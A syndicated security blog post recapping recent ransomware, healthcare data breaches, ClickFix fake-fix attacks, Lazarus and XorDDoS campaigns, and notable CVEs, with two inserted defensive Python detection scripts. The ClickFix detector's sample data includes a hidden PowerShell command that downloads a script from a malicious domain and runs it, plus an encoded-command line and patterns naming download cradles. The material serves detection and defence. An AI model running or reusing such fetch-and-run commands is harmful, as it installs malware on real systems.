
What Cybercriminals Have Been Up to Lately (And Why It Should Worry You)
If you’re skimming headlines thinking “another week, another breach,” you’re not wrong. From 5.5 million patient records stolen at a major U.S. health network to cybercrooks impersonating Microsoft to push ransomware, the past two weeks in cybersecurity have been… let’s just say eventful.
This blog is a snapshot, your curated tour of what really matters from ColorTokens’ latest threat intelligence brief (May 2025 Issue #2). If you’re short on time but big on security, here’s what you need to know to stay breach ready.
Ransomware, Red Flags, and $80K Demands
A major biotech firm’s entire operation was frozen in place—servers locked, data copied, and an $80,000 demand emailed in. The attackers encrypted all 15 of the company’s servers and threatened to wipe everything if a ransom wasn’t paid in 72 hours.
Investigators traced it back to a phishing email, and the pattern was textbook: an unpatched system, no offline backup, and a glaring hole in their firewall. Lesson? Ransomware isn’t just a tech problem. It’s a business continuity crisis waiting to happen.
What you can do:
- Backup critical data offline
- Train teams to spot phishing attempts
- Follow new security audit norms in your region
Yale New Haven Health: 5.5 Million Patient Records Gone
Another day, another hospital system breached. Yale New Haven Health confirmed a massive data breach that compromised patient names, SSNs, email addresses—even medical record numbers. While patient care wasn’t affected, the reputational damage is irreversible.
What’s worse? Nobody knows who did it. And yes, class-action lawsuits are already in the works.
Key takeaways:
- Improve segmentation to isolate sensitive data
- Encrypt everything—both at rest and in transit
- Audit your vendor ecosystem. Trust, but verify.
Want the full list of vulnerabilities, IOCs, and remediation steps? Download the full threat intelligence brief.
The Rise of ClickFix: When “Fix It” Means “You’re Owned”
Here’s a new trick straight from the Interlock ransomware gang: fake IT tools. You visit what looks like a legit Microsoft Teams or IP Scanner page. It says “Fix error—run this command.” And boom, you’ve just installed malware via PowerShell.
It’s called a ClickFix attack—and it’s as sneaky as it sounds.
Once installed, the malware deploys a remote access trojan (RAT), steals your files, and schedules a ransomware payload to detonate at 8 PM sharp.
Block these domains ASAP:
- microsoft-msteams[.]com
- advanceipscaner[.]com
And for the love of digital hygiene: don’t run random PowerShell commands.
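A defender-side triage of process-creation telemetry for the pattern described above, added here as an example (not ColorTokens' code or tooling): it flags PowerShell started from a parent that implies a human pasted the command, PowerShell carrying window-hiding, encoding or download flags, and any command line that references the two domains in the brief. The event field names and sample records are assumptions constructed for this example.

```python
import re

# Both domains are the defanged indicators quoted in the brief above.
CLICKFIX_DOMAINS = {"microsoft-msteams[.]com", "advanceipscaner[.]com"}

# Parents that mean a person pasted the command (Run dialog, browser), not a deployment tool.
USER_LAUNCHED_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}

# Flags and cmdlets typical of a one-line "fix" that hides its window, decodes or fetches a payload.
SUSPICIOUS_FLAGS = re.compile(
    r"-(?:w(?:indowstyle)?\s+hidden|e(?:nc(?:odedcommand)?)?\s|nop\b|noprofile|ep\s+bypass)"
    r"|\biwr\s|invoke-webrequest|downloadstring|\biex\b",
    re.IGNORECASE,
)

# Constructed process-creation records (assumed field names; real EDR telemetry will differ).
SAMPLE_EVENTS = [
    {"pid": 4120, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -c "iwr http://advanceipscaner.com/fix.ps1 | iex"'},
    {"pid": 4133, "parent": r"C:\Program Files\DeployAgent\agent.exe",  # hypothetical admin tool
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -ExecutionPolicy RemoteSigned -File C:\scripts\inventory.ps1"},
    {"pid": 4140, "parent": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "cmdline": "pwsh -nop -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
]

def score_event(event):
    """Return the reasons an event looks like a ClickFix-style paste-and-run; empty if benign."""
    image = event["image"].lower().rsplit("\\", 1)[-1]
    parent = event["parent"].lower().rsplit("\\", 1)[-1]
    cmd = event["cmdline"]
    if image not in {"powershell.exe", "pwsh.exe"}:
        return []
    reasons = []
    if parent in USER_LAUNCHED_PARENTS:
        reasons.append(f"powershell launched from {parent}")
    if SUSPICIOUS_FLAGS.search(cmd):
        reasons.append("hidden/encoded/download flags")
    for domain in CLICKFIX_DOMAINS:
        if domain.replace("[.]", ".") in cmd.lower():
            reasons.append(f"known ClickFix domain {domain}")
    return reasons

def triage(events):
    """Return (pid, reasons) for every event that scored at least one reason."""
    flagged = []
    for event in events:
        reasons = score_event(event)
        if reasons:
            flagged.append((event["pid"], reasons))
    return flagged
```

Run against `SAMPLE_EVENTS`, the scheduled-deployment record passes and the two browser/Run-dialog launches are flagged with their reasons.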
Blue Shield of California Accidentally Shared Health Data—With Google Ads
Yup. It wasn’t even a hack. From April 2021 to January 2024, misconfigured Google Analytics tags ended up leaking data from 4.7 million members to Google Ads.
Let that sink in: family size, insurance plan details, and even claim histories—handed over in the name of “personalization.” No external hackers required.
Why this matters:
- Not all breaches are caused by outsiders
- Misconfigurations can be just as dangerous
- Privacy must be part of your marketing and IT conversations
Lazarus Group Targets South Korea with Watering Hole Attacks
North Korea’s Lazarus Group is back, and they’ve been busy. Their latest campaign, dubbed Operation SyncHole, compromised legitimate South Korean websites and redirected visitors to fake software portals that silently loaded malware.
At least six companies across IT, finance, and telecom got hit. The payload? A sneaky backdoor called ThreatNeedle that collects everything from system info to keystrokes—and gives attackers full remote control.
How they did it:
- Exploited an old vulnerability in a popular file transfer client
- Used fake software sites to deliver the malware
- Jumped laterally inside networks using stolen credentials
If you work in a regulated or high-tech industry, double down on patching and endpoint monitoring. This was espionage, not extortion.
Think IoT Is Safe? XorDDoS Begs to Differ
Over 70% of attacks from the notorious XorDDoS botnet now target systems in the U.S., hitting everything from Linux servers to Docker containers and even IoT devices.
The infection method is ancient but effective: SSH brute force. Once in, it sets up persistence, connects to a Chinese-controlled command center, and turns your device into a DDoS zombie.
Simple fixes that work:
- Never allow SSH root logins
- Use MFA for server access
- Segment your IoT devices on separate VLANs
Also, rate-limit incoming traffic and use cloud-based DDoS protection if you’re hosting customer-facing apps.
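Detection logic for the SSH brute-force entry point described above, added here as an example (not ColorTokens' code): it parses constructed auth.log lines, flags any source that racks up a burst of failed passwords inside a short window, and separately reports every root login that succeeded with a password, which is exactly the door the "no root logins" fix closes. The log lines, hostnames and addresses are constructed for this example.

```python
import re
from collections import defaultdict
from datetime import datetime

# OpenSSH auth.log formats for failed and accepted logins (syslog timestamp has no year).
FAILED = re.compile(r"^(\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for "
                    r"(?:invalid user )?(\S+) from (\S+) port \d+ ssh2")
ACCEPTED = re.compile(r"^(\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Accepted (password|publickey) "
                      r"for (\S+) from (\S+)")

# Constructed sample: one burst from a single source ending in a password login as root,
# one user fat-fingering a password twice, and a normal key-based login.
SAMPLE_AUTH_LOG = """\
May 12 03:14:01 edge01 sshd[2201]: Failed password for root from 203.0.113.45 port 51022 ssh2
May 12 03:14:03 edge01 sshd[2203]: Failed password for invalid user admin from 203.0.113.45 port 51030 ssh2
May 12 03:14:05 edge01 sshd[2205]: Failed password for invalid user pi from 203.0.113.45 port 51041 ssh2
May 12 03:14:08 edge01 sshd[2207]: Failed password for root from 203.0.113.45 port 51055 ssh2
May 12 03:14:10 edge01 sshd[2209]: Failed password for root from 203.0.113.45 port 51060 ssh2
May 12 03:14:12 edge01 sshd[2211]: Failed password for root from 203.0.113.45 port 51071 ssh2
May 12 03:14:15 edge01 sshd[2213]: Accepted password for root from 203.0.113.45 port 51080 ssh2
May 12 03:20:44 edge01 sshd[2290]: Failed password for alice from 198.51.100.7 port 40212 ssh2
May 12 03:41:10 edge01 sshd[2310]: Failed password for alice from 198.51.100.7 port 40290 ssh2
May 12 03:42:00 edge01 sshd[2312]: Accepted publickey for deploy from 192.0.2.10 port 40300 ssh2
""".splitlines()

def parse_ts(stamp, year=2025):
    """Syslog timestamps carry no year; the caller supplies the one the log was written in."""
    return datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")

def detect_bruteforce(lines, threshold=5, window_sec=60):
    """Return ({ip: failures_in_worst_window}, [(ip, method)] for successful root logins)."""
    failures = defaultdict(list)
    root_logins = []
    for line in lines:
        m = FAILED.match(line)
        if m:
            failures[m.group(3)].append(parse_ts(m.group(1)))
            continue
        m = ACCEPTED.match(line)
        if m and m.group(3) == "root":
            root_logins.append((m.group(4), m.group(2)))
    flagged = {}
    for ip, times in failures.items():
        times.sort()
        for i in range(len(times)):  # sliding window over this source's failures
            j = i
            while j < len(times) and (times[j] - times[i]).total_seconds() <= window_sec:
                j += 1
            if j - i >= threshold:
                flagged[ip] = j - i
                break
    return flagged, root_logins
```

On the sample, the burst source is reported with six failures in one window and its subsequent password login as root surfaces in the second list; the two spaced-out failures from the legitimate user stay below the threshold.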
Critical CVEs You Shouldn’t Ignore
Some bugs just refuse to be quiet. A few highlights from this week’s hall of shame:
- CVE-2025-31324 (SAP NetWeaver): Zero-day file upload bug. RCE via malicious JSP shell. Patch now.
- CVE-2024-36347 (AMD Zen 5): Flawed signature verification. BIOS updates rolling out.
- CVE-2025-0665 (libcurl): Double-close issue. Crashes or DoS possible.
- CVE-2025-22457 (Ivanti VPN): Widely exploited buffer overflow, with malware linked to it.
- CVE-2025-29824 (Windows CLFS): Elevation of privilege. Exploited in attacks already.
Check the full threat intelligence report for all the nitty-gritty.
Breach Readiness Isn’t Optional
Every breach in this report had one thing in common: the attackers didn’t break in—they walked in through the front (or side) door left wide open. Whether it’s a phishing email, a missed patch, or a misconfigured web tool, the point is clear—proactive defense is cheaper than damage control.
So what should you do?
- Patch fast, patch often
- Segment like your business depends on it (because it does)
- Go Zero Trust—or go home
- Educate your people. They’re your best firewall
Stay safe. Stay sharp. Stay breach ready.
If you want to know about breach readiness strategies, feel free to reach out to us here.
*** This is a Security Bloggers Network syndicated blog from ColorTokens authored by ColorTokens Editorial Team. Read the original post at: https://colortokens.com/blogs/enterprise-ransomware-protection-insights/